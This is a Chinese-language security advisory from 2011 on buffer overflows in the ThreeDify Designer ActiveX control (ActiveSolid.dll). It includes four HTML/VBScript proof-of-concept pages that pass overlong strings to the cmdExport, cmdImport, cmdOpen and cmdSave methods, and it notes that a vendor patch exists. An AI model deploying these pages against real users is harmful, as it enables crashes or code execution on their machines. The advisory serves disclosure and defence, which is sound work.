ThreeDify Designer ActiveX Control "ActiveSolid.dll"多个缓冲区溢出漏洞
发布日期:2011-08-05
更新日期:2011-08-05
受影响系统:ThreeDify Designer ThreeDify Designer 5.0.2
描述:
BUGTRAQ ID:
49018
ThreeDify是3D建模、查看和标记应用程序,可使3D和3D CAD可视化变得简单容易。
ThreeDify在Designer ActiveX控件的多个方法的实现上存在漏洞,远程攻击者可利用此漏洞在受影响应用程序中创建或覆盖文件,可能以用户级别的权限执行任意代码。
ThreeDify.ThreeDifyDesigner.1 (ActiveSolid.dll) ActiveX中的边界错误可被利用通过发送到"cmdExport()", "cmdImport()", "cmdOpen()"和"cmdSave()"方法的超长的字符串造成缓冲区溢出。
<*来源:High-Tech Bridge SA (
http://www.htbridge.ch/)
链接:
http://www.htbridge.ch/advisory/threedify_designer_activex_control_insecure_method.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1.
<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdExport arg1
</script>
</body>
</html>
2.
<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdImport arg1
</script>
</body>
</html>
3.
<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdOpen arg1
</script>
</body>
</html>
4.
<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdSave arg1
</script>
</body>
</html>
建议:
厂商补丁:
ThreeDify Designer
------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.threedify.com/en/lightweight-3d/ms-office-add-ins/cad浏览次数:2153
严重程度:0(网友投票)
